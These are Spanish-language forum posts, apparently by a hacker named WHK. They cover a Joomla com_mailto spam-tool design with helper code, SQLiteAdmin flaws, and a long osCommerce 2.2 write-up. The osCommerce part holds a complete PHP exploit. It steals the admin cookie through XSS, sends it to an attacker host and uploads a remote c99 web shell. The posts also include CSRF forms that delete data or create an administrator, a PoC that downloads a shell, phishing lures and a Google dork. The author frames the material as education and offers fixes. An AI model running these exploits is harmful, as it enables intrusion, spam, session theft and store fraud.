Normalmente la gente está acostumbrada a localizar el valor de un token por su nombre pero en este caso es solo cosa de verificar un input que tenga el valor de "1" y que su nombre contenga 32 carácteres que es la cantidad exacta de un hash en MD5.

4. Antes de enviar todo esto hay que recordar que se necesta hacer una petición GET a la página para obtener la cookie de antemano o como sabremos cual enviar, también pasa con el token y lo demás asi que solicitamos la web pero cuando queremos enviar el formulario nos va a decir que fue imposible su envío y esto se debe a que joomla te fuerza a esperar 20 segundos aproximadamente entre que te dan el token y lo usas asi que ya tenemos el referer, la cookie con doble hash, el link en base64, el token anticsrf y el tiempo de espera.

Ahora con estos 4 puntos que debería hacer evitar un envío automatizado desde un bot o lo que sea nos encontramos con dos bugs, el primero es lo que ya vieron (no usa captcha) y el segundo esque cuando pasas los 20 segundos de espera te añade un token en tu sesión de cookie que dice que ya terminó t espera de 20 segundos pero lo que no verifica esque que pasa si vuelvo a enviar otro correo, en ese caso ya no me hará esperar porque mi cookie dice que yo ya esperé asi que solo debo esperar 20 segundos para enviar mis veintemil cuatrocientos noventa y un correos seguidos a los destinatarios que yo quiera porque el hash de la cookie y el token anticsrf no cambia en cada envío asi que puedo modificar cualquier dato del mail.

Pseudo-código
El software pide los siguientes datos:
url_del_joomla
para_email
de_nombre
de_correo
asunto_de_correo
X_Hilos
mensaje_al_mamahuevo[255]
/* de 255 carácteres porque esto irá en la petición GET asi que no debe sobrepasar la cantidad de carácteres límite de apache */

/* Inicia el proceso de recaudación de datos iniciales */
url = directorio(url_de_joomla) // Obtiene el directorio del joomla
host = servidor(ur_de_joomla) // Obtiene el nombre de dominio del url
Socket1 conecta a url_del_joomla puerto 80 protocolo TCP
Socket1 Envía los siguientes datos ->  // Protocolo HTTP -->
GET " +  url + "index.php?option=com_mailto&tmpl=component&link=" + urlencode(base64_encode(mensaje_al_mamahuevo)) + " HTTP/1.1" + (un salto de linea) +
"Host: " +  host + (un salto de linea) +
"Connection: close" + (un salto de linea) +
"User-Agent: Agente de usuario a gusto" + (dos saltos de linea)

Buffer = Recibe los datos debueltos por el socket
Cookie = función obtiene cookies (Buffer)
Token = función obtiene Token (Buffer)

Si la cookie tiene menos de 40 carácteres entonces es inválido y finaliza
/* Porque es n hash de 32 carácteres mas un pequeño hash desde 10 a 30 carácteres. */

Si el token no es de 32 carácteres entonces es inválido y finaliza
/* Porque un hash md5 es de 32 carácteres */

Esperar 20 segundos

Inicio del Loop
 Crear hilo de proceso con lo siguiente{ /* Con un máximo de X_hilos (por defecto usar 100)*/
  Inicio del Segundo Loop
   Si de_nombre es igual a "azar" entonces el de_nombre son 7 carácteres alfanuméricos al azar
   Si de_correo es igual a "azar" entonces el de_correo son 7 carácteres alfanuméricos al azar + "@" + el servidor que yo quiera pero que sea conocido
   Si el asunto es igual a "azar" entonces el asunto es igual a 7 carácteres alfanuméricos al azar

   Crea un nuevo Socket y lo conecta a url_de_joomla puerto 80 Protocolo TCP
  PostData es igual a -->
  "mailto=" + URLEncode(para_email) + (un salto de linea) +
  "&sender=" + URLEncode(de_nombre) + (un salto de linea) +
  "&from=" + URLEncode(de_correo) + (un salto de linea) +
  "&subject=" + URLEncode(asunto) + (un salto de linea) +
  "&link=" + URLEncode(EncodeStr64(Text9.Text)) + (un salto de linea) +
  "&" + URLEncode(Text11.Text) + "=1" + (un salto de linea) +
  "&layout=default&option=com_mailto&task=send&tmpl=component"
 
  El Socket creado envía lo siguiente ->
  "POST " + url + " HTTP/1.1" + (un salto de linea) +
  "Host: " + host + (un salto de linea) +
  "Referer: http://" + host + url + "index.php?option=com_mailto&tmpl=component&link=" + URLEncode(EncodeStr64(mensaje_al_mamahuevo)) + (un salto de linea) +
  "User-Agent: a elección pero que sea el mismo que el anterior" + (un salto de linea) +
  "Connection: Close" + (un salto de linea) +
  "Cookie:" + cookies + (un salto de linea) +
  "Content-Type: application/x-www-form-urlencoded" + (un salto de linea) +
  "Content-Length: " + cantidad de carácteres de PostData + (dos saltos de linea) +
  PostData + (dos saltos de linea)

 Cuando se desconecte volver al SegundoLoop
 }
Final del Loop

Al final debería quedar algo así:


No puedo poner el binario o la fuente directamente pero pondré el módulo hecho en visual basic para capturar el token y la cookie:

Public Function Obtener_Token(Buffer As String) As String
Dim Hash As String
Hash = InStr(1, Buffer, Chr(34) & " value=" & Chr(34) & "1" & Chr(34) & " />") ' " value="1" />
If Hash = 0 Then
 Exit Function
Else
 Obtener_Token = Mid$(Buffer, Int(Hash - 32), 32) ' Hash de 32 bites
End If
End Function
 
Public Function Obtener_Cookies(Buffer As String, Phpsessid_Off As Boolean) As String
Dim Temporal As String, Cookie As String
Rebuscar:
Cookie = InStr(1, Buffer, "Set-Cookie: ")
If Cookie = 0 Then
 Exit Function
Else
 Buffer = Mid$(Buffer, Cookie, Len(Buffer))
 Cookie = InStr(1, Buffer, ";")
 Temporal = Mid$(Buffer, 1, Cookie)
 Buffer = Mid$(Buffer, Cookie, Len(Buffer))
 Temporal = Replace(Temporal, "Set-Cookie: ", "")
 If Phpsessid_Off = True Then
  If Not Eregi("phpsessid", LCase(Temporal)) Then Obtener_Cookies = Obtener_Cookies & " " & Temporal
 Else
  Obtener_Cookies = Obtener_Cookies & " " & Temporal
 End If
 DoEvents
 GoTo Rebuscar
End If
End Function
 
Public Function URLEncode(sRawURL As String) As String
    On Error GoTo Catch
    Dim iLoop As Integer
    Dim sRtn As String
    Dim sTmp As String
    Const sValidChars = "1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz:._-(){}~"
 
 
    If Len(sRawURL) > 0 Then
        ' Loop through each char
 
 
        For iLoop = 1 To Len(sRawURL)
            sTmp = Mid(sRawURL, iLoop, 1)
 
 
            If InStr(1, sValidChars, sTmp, vbBinaryCompare) = 0 Then
                ' If not ValidChar, convert to HEX and p
                '     refix with %
                sTmp = Hex(Asc(sTmp))
 
 
                If sTmp = "20" Then
                    sTmp = "+"
                ElseIf Len(sTmp) = 1 Then
                    sTmp = "%0" & sTmp
                Else
                    sTmp = "%" & sTmp
                End If
 
            End If
 
            sRtn = sRtn & sTmp
        Next iLoop
 
        URLEncode = sRtn
    End If
 
Finally:
    Exit Function
Catch:
    URLEncode = ""
    Resume Finally
End Function
 
Public Function Eregi(Condicion As String, Buffer As String) As Boolean
 If InStr(1, Buffer, Condicion) > 0 Then Eregi = True Else Eregi = False
End Function
 
Public Function Nick_Azar() As String
 Nick_Azar = _
 Chr(Int(Rnd * 23) + 98) & _
 Chr(Int(Rnd * 23) + 98) & _
 Chr(Int(Rnd * 23) + 98) & _
 Chr(Int(Rnd * 23) + 98) & _
 Chr(Int(Rnd * 23) + 98) & _
 Chr(Int(Rnd * 23) + 98) & _
 Chr(Int(Rnd * 23) + 98)
End Function
 

al Obtener_Cookies le dan el bffer y le ponen como segunda variable un false para que devuelva la cookie que no es phpsessid y evita repeticiones de cookies como pasa en algunos sistemas como smf.

Y debería causar algo como esto:
http://img.drawcoders.net/index.php?acn=observar&idi=c8ce715057_spam.JPG

Pero está claro que es solo un ejemplo y que el software no no no no es real y es solo algo hecho en photoshop al igual que la otra captura
PD: Portalhack.us fue avisado y deshabilitaron ese componente asi que no los molesten.

Soy muy malo para hacer pseudocódigos asi que no reclamen por el source , se que falta destruir variables y verificar datos numéricos en inputs, etc etc etc pero solo mostré lo básico de como hacerlo, el resto ya es imaginación.

Consecuencias
Hay muchas consecuencias y la mas fatal es que tu servidor puede quedar dentro de la lista negra de servidores de correos como gmail, yahoo, etc y todos los correos que provengan de tu servidor se irán directamente a la bandeja de spam tenga el contenido que sea y con eso tu servidor morirá para enviar correos (o como se dice, se va a quemar).
La otra consecuencia es que puede haber gente victima de bombardeos de miles de correos con destinatarios diferentes y harás colapsar a tu pobre amigo tratando de borrar tanto correo ya que tendrá que fijarse si entre esos correos hay alguno normal o tirará todo lo que le llegue a su papelera dejando inutilizable su correo sea cual sea, ya que mandarlo como spam no serviría porque el atacante puede usar cuanto servidor se le cruze.
El otro problema es que le baja el autoestima al programador por estar haciendo makinas de spam  

También conversaba con un amigo sobre las consecuencias que podría llegar a causar esto ya que hay que tomar en cuenta que todos los correos llegan a la bandeja de entrada a menos que el servidor ya esté quemado pero de 100 talves uno no funcione, además podría cargarse un archivo de texto con correos y otro listado con sitios que usen joomla y tener una makina para espamear gratis sin kemar su propio server pero bueno, son cosas, desastres de la naturaleza hasta que lo reparen o aver si ahora si le dan importancia o simplemente comienze la gente a deshabilitar sus componentes.

Solución
Puedes integrarle una captcha a ese componente editando su código fuente para que acepte el valor del input de la captcha o simplemente deshabilita la opción de enviar email desde el menú de contenido yte vas a configuraciones, luego le das en no mostrar envío de email y pr si las dudas te vas a "instalar/desintalar" y deshabilitas el componente "com_mailto".


PD: en este tuto no salió ningún correo ni servidor dañado.
PD2:
GoogleDork: http://www.google.cl/search?hl=es&q=index.php%3Foption%3Dcom_content%26view%3Darticle%26id%3D+%26Itemid%3D&btnG=Buscar+con+Google&meta=&aq=f&oq=

Bueno, encontré multiples vulnerabilidades en Sqliteadmin las cuales son las siguientes:

---

Remote Execution
Hay ejecución remota cuando vas a la sección de bases de datos y le haces click en cualqueir función, entonces editas una función y al guardarla ya se estará ejecutando el código automáticamente:

Conversado con una persona me decía que esto no es arbitrario ya que el sistema deja por defecto crear funciones, pero .... normalmente no debería ejecutarse todo código que se escriba, normalmente debería quedar encerrado en una clase publica de forma que si hay una ejecución forzada no debería ejecutarse hasta que la función realmente sea llamada o necesitada y no cargar todo en memoria como se hace actualmente dejando desprotegido el sistema, a mucho debería tener un input para dictar el nombre de la función y un filtro que verifique que todas las llaves están correctamente cerradas para evitar el escape hacia fuera de la función.
Debería?... nop, no debería.

PoC:

$shell = file_get_contents('http://host/mi_shell_aca');
$out = 'c:\\wamp\\www\\x.php';
if(file_exists($out)) unlink($out);
$h = fopen($out, 'x');
fwrite($h, $shell);
fclose($h);
 

Fijarse que en win los slash son dobles "\\" porque uno solo es escape de carácter, es como decir "^<" en batch.

---

CSRF

No hay un token de verificación ni nada que impida la ejecución arbitraria de lo que al atacante se le antoje.

---

Path Disclosure
Puedes dar una ejecución arbitraria con error forzado y te arrojará un path disclosure:

La solución sería nunca mostrar error_reporting(E_ALL) en un sistema publicado.

---

Falta de Autificación
Como no hay un login de autentificación por defecto en este sistema pasa lo que pasa.

---

Consecuencias

---

Recomendaciones

Poner en un lugar mas inaccesible este sistema para que no pueda ser manipulado de forma externa y agregarle un login de seguridad como por ejemplo un auth de apache con htaccess.


Saludos.

Hace poco hubo un problema que pudo haber sido solucionado con esto.
La idea es poder saber si de alguna forma se puede saber la ip original desde javascript y hacer una comparación en php diciendo que si la ip otorgada por ajax no es igual al remote addr entonces es proxy y que guarde la ip original en un log de usuarios externo.

Pude leer en algunos sitios que esto era imposible a exepción si se hace desde java directamente y pasar el valor por medio de una variable hacia javascript y enviar la comparación al php.

Se podrá sin utilizar Java?

Bueno, acabo de terminar un documento que les puede servir a varios para poder aprender lo básico de un xss, csrf y alguno que otro bypass, también por otro lado les puede servir para que piensen dos veces que instalar al momento de crear una tienda virtual.

---

Link para su descarga : http://www.oscommerce.com/solutions/downloads
El presente documento está hecho con motivo de aprender de las vulnerabilidades de Oscommerce y saber como protegernos haciendo buenas elecciones al momento de buscar un sistema web que soporte una tienda online.
Oscommerce actualmente es uno de los sistemas públicos mas utilizados par crear sitios de ventas online, desafortunadamente también es uno de los mas vulnerables. Acá daré a conocer soolo algunos que yo pude encontrar. Si quieres buscar mas fallas de este sistema CMS puedes hacerlo desde acá:
http://www.google.cl/search?hl=es&q=oscommerce+vuln


XSS en múltiples secciones y Bypass al Anti-rrobo de sesiones

Para saber que significa XSS vea la sección de enlaces descriptivos que está al final de este documento.
Dentro del sistema de Administración podemos encontrar una sección donde podemos modificar banners, ahí nos encontramos con el archivo banner_manager.php:
http://127.0.0.1/oscommerce/admin/banner_manager.php?page=1&bID=1&action=new

Acá podemos ver una clara vulnerabilidad de tipo XSS en la variable llamada "page", probemos ...
http://127.0.0.1/oscommerce/admin/banner_manager.php?page=1'"><h1>lol&bID=1&action=new

Vemos lo siguiente:


Esto nos quiere decir que pudimos inyectar código HTML con éxito dentro del sistema WEB.
Actualmente este tipo de vulnerabilidades se cataloga como nivel medio bajo en lo que a peligrosidad se refiere tanto en Securityfocus como en Secunia, Firstit, Vupen, etc etc, pero yo les voy a demostrar que un escape de código html dentro de tu sitio web puede causar muchos riesgos.

Primero vamos a planear que hacer para poder tener las ideas mas claras.
Haremos un script en php y si el administrador lo ve desde su explorador entonces le robaremos su sesión y con eso ya podremos hacer lo que se nos antoje como por ejemplo subirle una shell.

Abrimos nuestro editor de textos y manos a la obra:

<?php
/* Prueba de concepto para Oscommerce 2.2, Upload de Shell via XSS. Por WHK */
$web_vulnerable = 'http://127.0.0.1/oscommerce/'; /* La URL de la web vulnerable */
$url_shell = 'http://www.geocities.com/zkizzik/c99.txt'; /* La URL de la Shell local o remnota */
$logs = md5($web_vulnerable).'_logs.txt'; /* Log donde se guardará el estado del ataque */
 
if(!$_GET){ /* Si no hay variables entonces procede a ... */
/*
Redirecciona al visitante hasta la página del oscommerce vulnerable,
obiamente lo enviamos hacia una url que causará que el mismo inyecte 
código html en su propia web, este código html dirá que nos envie su cookie
hasta este mismo script para su recepción y utilización.
*/
/* Si la url no contiene un slash al final entonces se lo agrega */
if($web_vulnerable[strlen($web_vulnerable) - 1] != '/') $web_vulnerable .= '/';
logs('Redireccionando hacia el XSS');
header(
 'Location: '.
 $web_vulnerable.
 'admin/banner_manager.php?page=1"><script src=http://'.
 $_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']
 .'?acc=js></script><br x="&bID=1&action=new'); // Redirección
 /* como Oscommerce agrega slashses a las comillas entonces intentaremos usar un incluye */
exit;
 
/* el dichoso javascript que nos robará la sesión */
}elseif($_GET['acc'] == 'js'){
 logs('Enviando código javascript');
 die('
  /* Script que obtiene galletas con sabor a chocolate */
  document.location="http://'.
  $_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'].
 '?acc=choco&galleta=" + escape(document.cookie) + "&uag=" + '.
 'escape(navigator.userAgent);
 ');
 
/* Recibe la cookie y comienza la massacre */
}elseif($_GET['acc'] == 'choco'){
 logs('Cookie recibida Cookie='.$_GET['galleta'].'');
 if(!$cookie = urldecode($_GET['galleta'])){
  logs('Se ha intentado enviar una cookie sin contenido');
  exit; /* Si no hay cookie se detiene */
 }
  /* Separa el host con la ruta para procesar la conexión sin CURL para mayor compatibilidad */
 $host = explode('/', $web_vulnerable);
 $host = $host[2];
 $url = explode('http://'.$host, $web_vulnerable);
 $url = $url[1].'/';
 // Envía la shell
 if(!$shell = file_get_contents($url_shell)){
  logs('No se pudo obtener la shell');
  exit;
 }
 $post_data = 
'-----------------------------66182058019796
Content-Disposition: form-data; name="file_1"; filename="config.php"
Content-Type: text/x-php
 
'.$shell.'
-----------------------------66182058019796
Content-Disposition: form-data; name="file_2"; filename=""
Content-Type: application/octet-stream
 
 
-----------------------------66182058019796
Content-Disposition: form-data; name="file_3"; filename=""
Content-Type: application/octet-stream
 
 
-----------------------------66182058019796
Content-Disposition: form-data; name="file_4"; filename=""
Content-Type: application/octet-stream
 
 
-----------------------------66182058019796
Content-Disposition: form-data; name="file_5"; filename=""
Content-Type: application/octet-stream
 
-----------------------------66182058019796
Content-Disposition: form-data; name="x"
 
'.rand(10,19).'
-----------------------------66182058019796
Content-Disposition: form-data; name="y"
 
'.rand(10,19).'
-----------------------------66182058019796--
 
';
 
 /* conexión y comprobación */
 if(!eregi('302', enviar_socket(
'POST '.$url.'admin/file_manager.php?action=processuploads HTTP/1.1
Host: '.$host.'
User-Agent: '.urldecode($_GET['uag']).'
Connection: close
Referer: http://'.$host.'/'.$url.'admin/file_manager.php?action=upload
Cookie: '.$cookie.'
Content-Type: multipart/form-data; boundary=---------------------------66182058019796
Content-Length: '.(int)strlen($post_data)."\n\n".$post_data))){
  logs('Error inesperado al intentar subir la shell o sistema no vulnerable');
  exit;
 }
 
 /* Valída el upload y verifica si terminó correctamente */
 if(eregi('images/icons/success.gif', enviar_socket(
'GET '.$url.'admin/file_manager.php HTTP/1.1
Host: '.$host.'
User-Agent: '.urldecode($_GET['uag']).'
Connection: close
Referer: http://'.$host.'/'.$url.'admin/file_manager.php?action=processuploads
Cookie: '.$cookie."\n\n\n"))){
  logs('Shell subida con éxito hacia URL='.$web_vulnerable.'config.php');
 }else{
  logs('Error inesperado al intentar subir la shell o sistema no vulnerable');
  exit;
 }
}
 
function handle_socket(){
 global $host;
 if(!$handle = fsockopen($host, 80)){
  logs('El servidor remoto no responde');
  exit;
 }
 return $handle;
}
 
function enviar_socket($buffer){
 $handle = handle_socket();
 fwrite($handle, $buffer);
  while(!feof($handle)){
  $buffer .= fgets($handle, 128);
 }
 fclose($handle);
 if(!$buffer){
  logs('El servidor remoto no responde');
  exit;
 }
 return $buffer;
}
 
function logs($contenido){
 global $logs;
 if(file_exists($logs)) $modo = 'a'; else $modo = 'x';
 if(!$handle = fopen($logs, $modo)) return false;
 fwrite($handle, '[+] DATE['.date(DATE_RFC822).'] IP['.$_SERVER['REMOTE_ADDR'].'] LOG['.$contenido."]\x0D\x0A");
 fclose($handle);
}
?>

Ahora, antes de explicar lo que hace cada línea les voy a decir como funciona.
Primero que nada debemos encontrar al Administrador con su sesión activa dentro del sistema y luego hacer que visualice este código WEB. Para hacerlo vamos a suponer una situación donde nos conectamos vía IRC o MSN con el Administrador y le sugerimos una configuración para poder optimizar su sitio Web como por ejemplo un dimensionado de la imagen de su banner o lo que sea, después que ya estamos seguros que está logueado le decimos que observe el tutorial donde se muestra con mas detalle y le damos la página que lo redireccionará hacia el XSS. También puedes enviarle múltiples Spam a su correo y esperar a que haga clic en una mientras está trabajando en su página. También puedes ocultar el script dentro de un iframe de 1 x 1 pixel mientras lee o ve un video ocultando la redirección.
En fin, hay muchas formas para hacer caer a alguien con tal de que vea el script que acabamos de hacer, una ves que lo haga solamente pasarán unos 2 o tres segundos y automáticamente se le subirá una shell a su propio servidor y quedará masomenos así:


Ahora si voy a explicar un poco el código para que todo mortal pueda entender que hace sin entrar mucho en el lenguaje de programación ya que los que saben está claro que ya saben como está hecho.

Para subirle la shell necesitamos primero ser Administradores, eso es normal así que primero vamos por la cookie, cuando el Administrador vea el script lo primero que se hará es redireccionarlo hacia:
http://127.0.0.1/oscommerce/admin/banner_manager.php?page=1"><script src=http://atacante.com/demanda.php?acc=js></script><br x="&bID=1&action=new

Lo que hará es redireccionarlo hacia la Web vulnerable e inyectará esto:

Asi que parte del código fuente queda de esta forma:

<form name="new_banner" action="http://127.0.0.1/oscommerce/admin/banner_manager.php?page=1\"><script src=http://atacante.com/demanda.php?acc=js></script><br x=\"&action=update" method="post" enctype="multipart/form-data">

De esta forma insertamos el archivo javascript dentro del código HTML sin romper su estructura y evitamos que se vea mal en caso de que algo falle.
Ahora este javascript nos ejecutará lo siguiente:

/* Script que obtiene galletas con sabor a chocolate */
document.location="http://atacante.com/demanda.php?acc=choco&galleta=" + escape(document.cookie) + "&uag=" + escape(navigator.userAgent);

Como ahora si podemos usar comillas dobles (recordemos que Oscommerce agrega salsees como si fuera magic quotes para prevenir no se que cosa porque hasta ahora no sirve de nada) hacemos que nos redirecciones hacia mi Web atacante y envíe la cookie (recuerden que la cookie es nuestra sesión como administradores). Algunas personas podrán simplificar esto con eval y charcote haciendo la redirección saltándose el paso de la inclusión del Script (si no entendiste no importa porque no es relevante para el que no sabe mucho del tema).
¿Porqué necesitamos el User Agent? (nombre del navegador):
En Oscommerce hay un sistema de seguridad para "supuestamente" prevenir este tipo de ataques, entonces lo obtenemos y lo utilizamos en nuestro script.
Código de "supuesta" seguridad en Oscommerce (Archivo "incluyes/application_top.php" Linea 227):

if ($SESSION_USER_AGENT != $http_user_agent){
      tep_session_destroy();
      tep_redirect(tep_href_link(FILENAME_LOGIN));
}

Bueno, ahora lo usamos en nuestro Script:

User-Agent: '.urldecode($_GET['uag']).'

Ahora que tenemos la cookie y el user agent podemos hacer lo que se nos antoje como modificar la contraseña, cambiar el correo para después recuperar el password, subir una shell, eliminar todo y poner una Web porno, modificar archivos php para capturar tarjetas de crédito con cvv2, etc etc (recuerden que esto es solo una prueba de concepto para demostrar lo que se puede llegar a hacer no para que lo pongan en práctica).

El resto del Script lo que hace es enviar el archivo de nuestra Shell de pruebas al servidor desde:
http://127.0.0.1/oscommerce/admin/file_manager.php?action=processuploads

Respetando el referer que es desde "admin/file_manager.php?action=upload" y enviamos nuestra petición POST con 5 archivos, si pones solo uno te lo rechaza, ponemos nuestra shell en el archivo 1 y los demás en blanco, ahora nos darán una redirección hacia "admin/file_manager.php" así que la visualizamos y nos valida recién el upload.
También me encontré con dos variables, una llamada "y" y "x" con un valor al azar entre 1 y 20 así que se lo agregué al script para poder reflejar una simulación lo mas igualada posible a un explorador, si se los sacas no funcionará.

Secciones donde puedes encontrarás XSS:
http://127.0.0.1/oscommerce/admin/categories.php?action=new_product_preview&read=only&pID=18&origin=stats_products_viewed.php?page=1'"><h1>test
http://127.0.0.1/oscommerce/admin/configuration.php?gID=1'"><h1>test
y en casi todas las secciones de administración donde veas una variable "page", "id", etc etc. Solo es cosa de ir probando porque si me pongo a mostrarlas todas voy a terminar este documento el año que viene.


Múltiples XSRF (Cross Site Request Forgery)

Para saber que significa XSRF vea la sección de enlaces descriptivos que está al final de este documento.
Primeramente intentaré eliminar una categoría manualmente y al hacerlo me pide una confirmación, al darle clic al botón para aceptar su eliminación me pongo a visualizar los datos que estoy enviando desde el Live Headers:



Acá vemos que se envía la variable categories_id diciendo que se va a eliminar pero en ningún lado vemos que nos adjunta algún tipo de dispositivo de seguridad que evite un ataque automatizado, por ejemplo un hash o cosas similares por lo tanto el ataque es tan obvio como la falla:

<form method="post" action="http://127.0.0.1/oscommerce/admin/categories.php?action=delete_category_confirm&cPath=">
<input type=hidden name="categories_id" value="1" />
</form>
<script>document.getElementsByTagName("form")[0].submit();</script>

Creamos un archivo HTML que contenga esto y hacemos que el administrador lo visualize, al hacerlo estará eliminando involuntariamente la primera categoría de productos de su tienda virtual.
Esto podemos hacerlo con cualquier tipo de dato o configuración ya que en ningún caso se verifica un hash para prevenir este tipo de ataques.

Te gustaría crear un nuevo usuario con derechos de Administración?

<form method="post" action="http://127.0.0.1/oscommerce/admin/administrators.php?action=insert">
<input type=hidden name="username" value="r00t" />
<input type=hidden name="password" value="r00ted" />
<input type=hidden name="x" value="16" />
<input type=hidden name="y" value="13" />
</form>
<script>document.getElementsByTagName("form")[0].submit();</script>

Tan fácil y sencillo.

También puedes activar de forma remota tipos de pago:
http://127.0.0.1/oscommerce/admin/modules.php?set=payment&module=paypal_express&action=install

Acá activas el tipo de pago Paypal Express y tener la oportunidad de hacer compras fraudulentas si es que es un sitio de ventas en tiempo real como por ejemplo venta de softwares.
Incluso puedes adjuntarlo en una imagen o un avatar, etc:

<img src="http://127.0.0.1/oscommerce/admin/modules.php?set=payment&module=paypal_express&action=install" />

Otro problema de Oscommerce es que utiliza $_SERVER['PHP_SELF'] en casi todas sus secciones y este parámetro si no se sabe utilizar puede causar fallas de tipo XSS:


Si buscamos sin mucho detalle:


Tenemos 26 archivos solamente con esta vulnerabilidad.
En este caso como no necesariamente está en el sistema de Administración puede lanzarse con toda confianza un ataque al propio administrador sin preocuparse si su directorio está protegido por Apache (autentification) ya que desde el mismo javascript con XMLHTTP puedes comprobar si tienes acceso o no y evitar un pantallaza del login, incluso puedes lanzar un popup por detrás del navegador y con un javascript que constantemente verifique si el Administrador entró en el sistema o no para poder continuar con el ataque.
También puedes afectar a los usuarios y robarle sus sesiones y apoderarse de sus compras.

¿Que tal estaría poder modificar el precio de los productos?, a mi no me gustaría que me hicieran eso y no se si a alguna empresa le guste tampoco.
 

Conclusión

Oscommerce es un sistema muy útil pero llega a ser tan útil como inseguro y es una situación bastante delicada cuando se pretende cobrar dinero de forma online y tener tu propia tienda virtual.

Que sea gratuito no significa que sea malo, las vulnerabilidades las pueden cometer muchos programadores incluso los que se dedican a la venta de sistemas entre comillas. Hay muchas alternativas mejores por el mismo precio ($0) que están licenciada bajo la licencia GNU.

Una vulnerabilidad no es algo aislado que puedas ver en un foro o en un grupo de personas con tiempo libre, es algo que se toma muy en serio cuando se habla de sistemas profesionales, no creo que alguien se desgaste haciendo una bóveda del porte de una cancha de fútbol sin ponerle la cerradura a la puerta.

Muchos sitios que hablan sobre Advisories dicen que el XSS es considerado de riesgo a nivel medio (antiguamente era bajo), pues para mi puede ser tan fatal como cualquier otro así que si tienes un XSS en tu sitio Web te recomiendo que lo repares.

Puedes ahorrar una buena cantidad de dinero mensualmente evitando que tu técnico venga a reinstalar tu sitio Web porque fue penetrada y también te ahorras el dinero del auditor para corroborar si no hay indicios de rooteo que pueda comprometer al servidor en un futuro después de haber hecha la reinstalación.


Enlaces descriptivos

http://es.wikipedia.org/wiki/Cross-site_scripting
http://es.wikipedia.org/wiki/Cross_Site_Request_Forgery
http://es.wikipedia.org/wiki/Agentes_de_usuario
http://www.google.cl/search?hl=es&q=bypass+vuln
(Bypass: Descubrimiento de evasión, en este caso se trata de evadir el sistema de protección que evita un ataque.)
http://www.oscommerce.com/
http://foro.elhacker.net/nivel_web/temas_mas_destacados_fallas_y_explotaciones-t244090.0.html
http://foro.elhacker.net/documentacion/los_poderes_secretos_de_xss_cross_site_scripting-t98324.0.html
http://www.google.cl/search?hl=es&q=xss+vuln
http://es.wikipedia.org/wiki/GPL
http://www.gnu.org/licenses/licenses.es.html


Agradecimientos

Gracias al foro de ElHacker.Net por darme la oportunidad de tener cada día mas conocimiento frente al tema de la seguridad informática y aplicarlo en el mundo laboral.
Gracias a Nakp por prestarse siempre de betatester para lo que sea aunque en esta ocasión no se pudo porque no le avisé :p
Gracias a KrackWar por su vida social (nuevamente)
Gracias a mi compadre Octalh por llevarme por el camino del conocimiento y el Software Libre XD
Gracias a mis amigos de la red: MITM, Sirdarckcat, Unika, PokasPulgas, Nano N Roses, Dementes en el espacio, CarlosWaldo (alias carlos aguado) y a todos los de la sala de Yahoo Chat "Cristianismo:1" y "Programación:1".


Att, WHK.
[email]www.kernel32@gmail.com[/email]
http://foro.elhacker.net/profiles/whk-u148268.html

Puedes publicar este documento donde tu quieras siempre y cuando no sea modificado.

---

Si tienen alguna duda pregunten porque nadie ha nacido sabiendo las cosas.
Descarga en formato .doc acá